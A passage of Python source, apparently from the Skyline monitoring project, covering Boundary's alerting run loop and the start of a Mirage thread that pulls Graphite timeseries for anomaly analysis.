                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        added_at = str(int(time()))
                        source = 'graphite'
                        panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = [\'%s\']\n' \
                                                'triggered_algorithms = [\'%s\']\n' \
                                                'app = \'%s\'\n' \
                                                'source = \'%s\'\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(algorithm), str(algorithm),
                               skyline_app, source, this_host, added_at)

                        # Create an anomaly file with details about the anomaly
                        panaroma_anomaly_file = '%s/%s.%s.txt' % (
                            settings.PANORAMA_CHECK_PATH, added_at, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, panaroma_anomaly_file, 'w',
                                panaroma_anomaly_data)
                            logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        except Exception:
                            logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                            logger.info(traceback.format_exc())

                    # If crucible is enabled - save timeseries and create a
                    # crucible check
                    if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED:
                        crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                        if not os.path.exists(crucible_anomaly_dir):
                            # Octal literal: int('0755') is decimal 755,
                            # which is not the rwxr-xr-x mode intended
                            os.makedirs(crucible_anomaly_dir, 0o755)

                        # Note:
                        # Due to only one algorithm triggering here the
                        # algorithm related arrays here are a different format
                        # to their output format in analyzer

                        # Note:
                        # The value is enclosed in single quotes intentionally
                        # as the imp.load_source used in crucible results in a
                        # shift in the decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        crucible_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'anomaly_dir = \'%s\'\n' \
                                                'graphite_metric = True\n' \
                                                'run_crucible_tests = False\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(algorithm),
                               triggered_algorithms, crucible_anomaly_dir,
                               skyline_app, metric_timestamp)

                        # os.chmod needs an integer mode; the string '0o644'
                        # raises TypeError and int('0644') is decimal 644
                        file_mode = 0o644

                        # Create an anomaly file with details about the anomaly
                        crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                        with open(crucible_anomaly_file, 'w') as fh:
                            fh.write(crucible_anomaly_data)
                        os.chmod(crucible_anomaly_file, file_mode)
                        logger.info('added crucible anomaly file :: %s/%s.txt' % (crucible_anomaly_dir, base_name))

                        # Create timeseries json file with the timeseries
                        json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                        timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                        with open(json_file, 'w') as fh:
                            # timeseries
                            fh.write(timeseries_json)
                        os.chmod(json_file, file_mode)
                        logger.info('added crucible timeseries file :: %s/%s.json' % (crucible_anomaly_dir, base_name))

                        # Create a crucible check file
                        crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                        with open(crucible_check_file, 'w') as fh:
                            fh.write(crucible_anomaly_data)
                        os.chmod(crucible_check_file, file_mode)
                        logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except Exception:
                exceptions['Other'] += 1
                logger.info("exceptions['Other'] traceback follows:")
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process intializes.

        Loops forever: checks Redis, builds the boundary metric list, runs
        the spin_process workers, sends alerts, reports statistics and then
        sleeps for the remainder of the optimum run duration.
        """
        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)

        # Wait up to 5 seconds for the log lock file to go away
        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.error('error :: skyline cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if not unique_metrics:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Reset boundary_metrics
            boundary_metrics = []

            # Build boundary metrics
            for metric_name in unique_metrics:
                for metric in BOUNDARY_METRICS:
                    CHECK_MATCH_PATTERN = metric[0]
                    check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    pattern_match = check_match_pattern.match(base_name)
                    if pattern_match:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: boundary metric - pattern MATCHED - ' + metric[0] + " | " + base_name)
                        boundary_metrics.append([metric_name, metric[1]])

            if ENABLE_BOUNDARY_DEBUG:
                logger.info('debug :: boundary metrics - ' + str(boundary_metrics))

            if not boundary_metrics:
                logger.info('no Boundary metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.BOUNDARY_PROCESSES + 1):
                if i > len(boundary_metrics):
                    logger.info('WARNING: Skyline Boundary is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, boundary_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    anomaly_breakdown[key] = anomaly_breakdown.get(key, 0) + value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    exceptions[key] = exceptions.get(key, 0) + value
                except Empty:
                    break

            # Send alerts
            if settings.BOUNDARY_ENABLE_ALERTS:
                for anomalous_metric in self.anomalous_metrics:
                    datapoint = str(anomalous_metric[0])
                    metric_name = anomalous_metric[1]
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    expiration_time = str(anomalous_metric[2])
                    metric_trigger = str(anomalous_metric[5])
                    alert_threshold = int(anomalous_metric[6])
                    metric_alerters = anomalous_metric[7]
                    algorithm = anomalous_metric[8]
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info("debug :: anomalous_metric - " + str(anomalous_metric))

                    # Determine how many times has the anomaly been seen if the
                    # ALERT_THRESHOLD is set to > 1 and create a cache key in
                    # redis to keep count so that alert_threshold can be honored

                    # Default to a first sighting so times_seen is always
                    # bound, including when the redis lookup below fails
                    # (previously a stale value from the prior metric, or a
                    # NameError, was used in that case)
                    times_seen = 1
                    if alert_threshold in (0, 1):
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug :: alert_threshold - " + str(alert_threshold))

                    if alert_threshold > 1:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: alert_threshold - ' + str(alert_threshold))
                        anomaly_cache_key_count_set = False
                        anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60
                        anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name)
                        try:
                            anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key)
                            if not anomaly_cache_key_count:
                                try:
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('debug :: redis no anomaly_cache_key - ' + str(anomaly_cache_key))
                                    times_seen = 1
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('debug :: redis setex anomaly_cache_key - ' + str(anomaly_cache_key))
                                    self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                    logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                                except Exception as e:
                                    logger.error('error :: redis setex failed :: %s' % str(anomaly_cache_key))
                                    logger.error('error :: could not set key: %s' % e)
                            else:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: redis anomaly_cache_key retrieved OK - ' + str(anomaly_cache_key))
                                anomaly_cache_key_count_set = True
                        except Exception:
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info('debug :: redis failed - anomaly_cache_key retrieval failed - ' + str(anomaly_cache_key))
                            anomaly_cache_key_count_set = False

                        if anomaly_cache_key_count_set:
                            unpacker = Unpacker(use_list=False)
                            unpacker.feed(anomaly_cache_key_count)
                            raw_times_seen = list(unpacker)
                            times_seen = int(raw_times_seen[0]) + 1
                            try:
                                self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                # Success path: not prefixed with 'error ::'
                                logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                            except Exception:
                                times_seen = 1
                                logger.error('error :: set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen)))

                    # Alert the alerters if times_seen > alert_threshold
                    if times_seen >= alert_threshold:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: times_seen %s is greater than or equal to alert_threshold %s' % (str(times_seen), str(alert_threshold)))
                        for alerter in metric_alerters.split("|"):
                            # Determine alerter limits
                            send_alert = False
                            alerts_sent = 0
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info('debug :: checking alerter - %s' % alerter)
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: determining alerter_expiration_time for settings')
                                alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter]
                                alerter_expiration_time = int(alerter_expiration_time_setting)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: determined alerter_expiration_time from settings - %s' % str(alerter_expiration_time))
                            except Exception:
                                # Set an arbitrary expiry time if not set
                                alerter_expiration_time = 160
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: could not determine alerter_expiration_time from settings")

                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: determining alerter_limit from settings")
                                alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter]
                                alerter_limit = int(alerter_limit_setting)
                                alerter_limit_set = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: determined alerter_limit from settings - %s" % str(alerter_limit))
                            except Exception:
                                alerter_limit_set = False
                                send_alert = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: could not determine alerter_limit from settings")

                            # If the alerter_limit is set determine how many
                            # alerts the alerter has sent
                            if alerter_limit_set:
                                alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                try:
                                    alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key)
                                    if not alerter_sent_count_key_data:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key))
                                        alerts_sent = 0
                                        send_alert = True
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: alerts_sent set to %s" % str(alerts_sent))
                                            # was str(sent_alert): undefined name
                                            logger.info("debug :: send_alert set to %s" % str(send_alert))
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: redis alerter key retrieved, unpacking" + str(alerter_sent_count_key))
                                        unpacker = Unpacker(use_list=False)
                                        unpacker.feed(alerter_sent_count_key_data)
                                        raw_alerts_sent = list(unpacker)
                                        alerts_sent = int(raw_alerts_sent[0])
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: alerter %s alerts sent %s " % (str(alerter), str(alerts_sent)))
                                except Exception:
                                    logger.info("No key set - %s" % alerter_sent_count_key)
                                    alerts_sent = 0
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug :: alerts_sent set to %s" % str(alerts_sent))
                                        logger.info("debug :: send_alert set to %s" % str(send_alert))

                                if alerts_sent < alerter_limit:
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug :: alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit)))
                                        logger.info("debug :: send_alert set to %s" % str(send_alert))

                            # Send alert
                            alerter_alert_sent = False
                            if send_alert:
                                cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: checking cache_key - %s" % cache_key)
                                try:
                                    last_alert = self.redis_conn.get(cache_key)
                                    if not last_alert:
                                        try:
                                            self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0])))
                                            if ENABLE_BOUNDARY_DEBUG:
                                                logger.info('debug :: key setex OK - %s' % (cache_key))
                                            trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                            alerter_alert_sent = True
                                        except Exception as e:
                                            logger.error('error :: alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            logger.error('error :: could not send alert: %s' % str(e))
                                            trigger_alert('syslog', datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            # Two placeholders for the two values
                                            # supplied; the former message had a
                                            # third and raised TypeError
                                            logger.info("debug :: cache_key exists not alerting via %s for %s" % (alerter, cache_key))
                                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                except Exception:
                                    trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                            else:
                                trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

                            # Update the alerts sent for the alerter cache key,
                            # to allow for alert limiting
                            if alerter_alert_sent and alerter_limit_set:
                                try:
                                    alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                    new_alerts_sent = int(alerts_sent) + 1
                                    self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent)))
                                    logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                                except Exception:
                                    logger.error('error :: failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                    else:
                        # Always alert to syslog, even if alert_threshold is not
                        # breached or if send_alert is not True
                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            run_time = time() - now
            total_metrics = str(len(boundary_metrics))
            total_analyzed = str(len(boundary_metrics) - sum(exceptions.values()))
            total_anomalies = str(len(self.anomalous_metrics))

            # Log progress
            logger.info('seconds to run    :: %.2f' % run_time)
            logger.info('total metrics     :: %s' % total_metrics)
            logger.info('total analyzed    :: %s' % total_analyzed)
            logger.info('total anomalies   :: %s' % total_anomalies)
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            graphite_run_time = '%.2f' % run_time
            send_metric_name = skyline_app_graphite_namespace + '.run_time'
            send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)

            send_metric_name = skyline_app_graphite_namespace + '.total_analyzed'
            send_graphite_metric(skyline_app, send_metric_name, total_analyzed)

            send_metric_name = skyline_app_graphite_namespace + '.total_anomalies'
            send_graphite_metric(skyline_app, send_metric_name, total_anomalies)

            send_metric_name = skyline_app_graphite_namespace + '.total_metrics'
            send_graphite_metric(skyline_app, send_metric_name, total_metrics)

            for key, value in exceptions.items():
                send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            for key, value in anomaly_breakdown.items():
                send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                send_metric_name = skyline_app_graphite_namespace + '.duration'
                send_graphite_metric(skyline_app, send_metric_name, str(time_human))

                send_metric_name = skyline_app_graphite_namespace + '.projected'
                send_graphite_metric(skyline_app, send_metric_name, str(projected))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Only run once per BOUNDARY_OPTIMUM_RUN_DURATION (60 if not set)
            process_runtime = time() - now
            try:
                boundary_optimum_run_duration = settings.BOUNDARY_OPTIMUM_RUN_DURATION
            except Exception:
                boundary_optimum_run_duration = 60

            if process_runtime < boundary_optimum_run_duration:
                sleep_for = (boundary_optimum_run_duration - process_runtime)
                logger.info('sleeping %.2f for seconds' % sleep_for)
                sleep(sleep_for)
class Mirage(Thread):
    """
    The Mirage thread.

    Picks up metric check files from ``settings.MIRAGE_CHECK_PATH``, surfaces
    the related timeseries from Graphite at the requested resolution, runs
    the Mirage algorithms over it in a spawned process and then alerts on
    (or negates) the result.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Mirage

        :param parent_pid: pid of the parent process, used by
            :func:`check_if_parent_is_alive`.
        """
        super(Mirage, self).__init__()
        # run() pings this connection on every iteration, so it has to exist
        # before the first ping instead of being created by the error path.
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.mirage_exceptions_q = Queue()
        self.mirage_anomaly_breakdown_q = Queue()
        self.not_anomalous_metrics = Manager().list()
        self.metric_variables = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Exit the current process if it, or its parent, can no longer be
        signalled.
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    def mkdir_p(self, path):
        """
        Create ``path`` and any missing parents.

        :return: True when the directory was created, None when it already
            existed.
        :raises OSError: for any failure other than "already exists as a
            directory".
        """
        try:
            os.makedirs(path)
            return True
        # Python >2.5
        except OSError as exc:
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    @staticmethod
    def _ensure_dir(path, mode=0o755):
        """
        Create ``path`` with ``mode`` if it does not exist yet.

        ``0o755`` is valid octal syntax on Python 2.6+ and Python 3, so no
        per-version branch is needed.
        """
        if not os.path.exists(path):
            os.makedirs(path, mode)

    @staticmethod
    def _drain_queue(q):
        """
        Empty ``q`` of ``(key, value)`` tuples and return the per-key sums.
        """
        totals = dict()
        while 1:
            try:
                key, value = q.get_nowait()
            except Empty:
                break
            if key not in totals:
                totals[key] = value
            else:
                totals[key] += value
        return totals

    def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
        """
        Fetch the timeseries for ``metric_name`` from Graphite and write it
        as ``[timestamp, value]`` pairs to
        ``<MIRAGE_DATA_FOLDER>/<target>/<target>.json``.

        :return: True when the json file was written, False when the data
            could not be retrieved from Graphite.
        """
        # We use absolute time so that if there is a lag in mirage the correct
        # timeseries data is still surfaced relevant to the anomalous datapoint
        # timestamp
        if settings.GRAPHITE_PORT != '':
            url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
                metric_name)
        else:
            url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                graphite_from, graphite_until, metric_name)

        # A failed request, a non-json body or an empty result must not kill
        # the spawned process: the caller checks for the json file and cleans
        # up the check file when it is missing.
        try:
            r = requests.get(url)
            js = r.json()
            datapoints = js[0]['datapoints']
        except (requests.exceptions.RequestException, ValueError, LookupError, TypeError):
            logger.error('error :: failed to surface %s timeseries from graphite' % metric_name)
            logger.info(traceback.format_exc())
            return False

        converted = []
        for datapoint in datapoints:
            try:
                # Graphite returns [value, timestamp]; null values are skipped
                new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                converted.append(new_datapoint)
            except (TypeError, ValueError, IndexError):
                continue

        parsed = urlparse.urlparse(url)
        target = urlparse.parse_qs(parsed.query)['target'][0]

        metric_data_folder = settings.MIRAGE_DATA_FOLDER + "/" + target
        self.mkdir_p(metric_data_folder)
        with open(metric_data_folder + "/" + target + '.json', 'w') as f:
            f.write(json.dumps(converted))
        return True

    def load_metric_vars(self, filename):
        """
        Load the check file ``filename`` into the module level
        ``metric_vars`` global.

        :return: True when the file was loaded, False when it does not exist.
        """
        global metric_vars
        if not os.path.isfile(filename):
            return False
        # The context manager closes the handle even if load_source raises
        with open(filename) as f:
            metric_vars = imp.load_source('metric_vars', '', f)
        return True

    def spin_process(self, i, run_timestamp):
        """
        Assign a metric for a process to analyze.

        :param i: the process number (unused by the analysis itself).
        :param run_timestamp: timestamp of the run, used for the stale check.
        """

        # Discover metric to analyze
        metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]

        # Check if this process is unnecessary
        if len(metric_var_files) == 0:
            return

        metric_var_files_sorted = sorted(metric_var_files)
        metric_check_file = '%s/%s' % (
            settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))

        # Load metric variables - the check file may have been removed since
        # the directory was listed, in which case there is nothing to do
        if not self.load_metric_vars(metric_check_file):
            logger.error('error :: failed to load metric variables from %s' % (metric_check_file))
            return

        # Test metric variables
        if len(metric_vars.metric) == 0:
            return
        else:
            metric = metric_vars.metric
            metric_name = ['metric_name', metric_vars.metric]
            self.metric_variables.append(metric_name)
        if len(metric_vars.value) == 0:
            return
        else:
            metric_value = ['metric_value', metric_vars.value]
            self.metric_variables.append(metric_value)
        if len(metric_vars.hours_to_resolve) == 0:
            return
        else:
            hours_to_resolve = ['hours_to_resolve', metric_vars.hours_to_resolve]
            self.metric_variables.append(hours_to_resolve)
        if len(metric_vars.metric_timestamp) == 0:
            return
        else:
            metric_timestamp = ['metric_timestamp', metric_vars.metric_timestamp]
            self.metric_variables.append(metric_timestamp)

        # Ignore any metric check older than MIRAGE_STALE_SECONDS
        int_metric_timestamp = int(metric_vars.metric_timestamp)
        int_run_timestamp = int(run_timestamp)
        metric_timestamp_age = int_run_timestamp - int_metric_timestamp
        if metric_timestamp_age > settings.MIRAGE_STALE_SECONDS:
            logger.info('stale check :: %s check request is %s seconds old - discarding' % (metric_vars.metric, metric_timestamp_age))
            # Remove metric check file
            if os.path.exists(metric_check_file):
                os.remove(metric_check_file)
                logger.info('removed %s' % (metric_check_file))
            else:
                logger.info('could not remove %s' % (metric_check_file))
            # The check has been discarded, do not analyze it
            return

        # Calculate hours second order resolution to seconds
        second_order_resolution_seconds = int(metric_vars.hours_to_resolve) * 3600

        # Calculate graphite from and until parameters from the metric timestamp
        graphite_until = datetime.datetime.fromtimestamp(int(metric_vars.metric_timestamp)).strftime('%H:%M_%Y%m%d')
        int_second_order_resolution_seconds = int(second_order_resolution_seconds)
        second_resolution_timestamp = int_metric_timestamp - int_second_order_resolution_seconds
        graphite_from = datetime.datetime.fromtimestamp(int(second_resolution_timestamp)).strftime('%H:%M_%Y%m%d')

        # Remove any old json file related to the metric
        metric_json_file = '%s/%s/%s.json' % (
            settings.MIRAGE_DATA_FOLDER, str(metric_vars.metric),
            str(metric_vars.metric))
        try:
            os.remove(metric_json_file)
        except OSError:
            pass

        # Get data from graphite
        logger.info(
            'retrieve data :: surfacing %s timeseries from graphite for %s seconds' % (
                metric_vars.metric, second_order_resolution_seconds))
        self.surface_graphite_metric_data(metric_vars.metric, graphite_from, graphite_until)

        # Check there is a json timeseries file to test
        if not os.path.isfile(metric_json_file):
            logger.error(
                'error :: retrieve failed - failed to surface %s timeseries from graphite' % (
                    metric_vars.metric))
            # Remove metric check file
            try:
                os.remove(metric_check_file)
            except OSError:
                pass
            return
        else:
            logger.info('retrieved data :: for %s at %s seconds' % (
                metric_vars.metric, second_order_resolution_seconds))

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        self.check_if_parent_is_alive()

        with open((metric_json_file), 'r') as f:
            timeseries = json.loads(f.read())
            logger.info('data points surfaced :: %s' % (len(timeseries)))

        try:
            logger.info('analyzing :: %s at %s seconds' % (metric_vars.metric, second_order_resolution_seconds))
            anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_vars.metric, second_order_resolution_seconds)

            # If it's anomalous, add it to list
            if anomalous:
                base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
                anomalous_metric = [datapoint, base_name]
                self.anomalous_metrics.append(anomalous_metric)
                logger.info('anomaly detected :: %s with %s' % (metric_vars.metric, metric_vars.value))
                # It runs so fast, this allows us to process 30 anomalies/min
                sleep(2)

                # Get the anomaly breakdown - who returned True?
                triggered_algorithms = []
                for index, value in enumerate(ensemble):
                    if value:
                        algorithm = settings.MIRAGE_ALGORITHMS[index]
                        anomaly_breakdown[algorithm] += 1
                        triggered_algorithms.append(algorithm)

                # If Crucible or Panorama are enabled determine details
                determine_anomaly_details = False
                if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
                    determine_anomaly_details = True
                if settings.PANORAMA_ENABLED:
                    determine_anomaly_details = True

                if determine_anomaly_details:
                    metric_timestamp = str(int(timeseries[-1][0]))
                    # NOTE(review): index 1, not 0, is used as the "from"
                    # datapoint - kept as found, confirm this is intended.
                    from_timestamp = str(int(timeseries[1][0]))
                    timeseries_dir = base_name.replace('.', '/')

                # If Panorama is enabled - create a Panorama check
                if settings.PANORAMA_ENABLED:
                    self._ensure_dir(settings.PANORAMA_CHECK_PATH)

                    # Note:
                    # The values are enclosed is single quoted intentionally
                    # as the imp.load_source used results in a shift in the
                    # decimal position when double quoted, e.g.
                    # value = "5622.0" gets imported as
                    # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                    # single quoting results in the desired,
                    # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                    added_at = str(int(time()))
                    source = 'graphite'
                    panaroma_anomaly_data = (
                        'metric = \'%s\'\n'
                        'value = \'%s\'\n'
                        'from_timestamp = \'%s\'\n'
                        'metric_timestamp = \'%s\'\n'
                        'algorithms = %s\n'
                        'triggered_algorithms = %s\n'
                        'app = \'%s\'\n'
                        'source = \'%s\'\n'
                        'added_by = \'%s\'\n'
                        'added_at = \'%s\'\n'
                        % (base_name, str(datapoint), from_timestamp,
                           metric_timestamp, str(settings.MIRAGE_ALGORITHMS),
                           triggered_algorithms, skyline_app, source,
                           this_host, added_at))

                    # Create an anomaly file with details about the anomaly
                    panaroma_anomaly_file = '%s/%s.%s.txt' % (
                        settings.PANORAMA_CHECK_PATH, added_at, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, panaroma_anomaly_file, 'w',
                            panaroma_anomaly_data)
                        logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                    except Exception:
                        logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
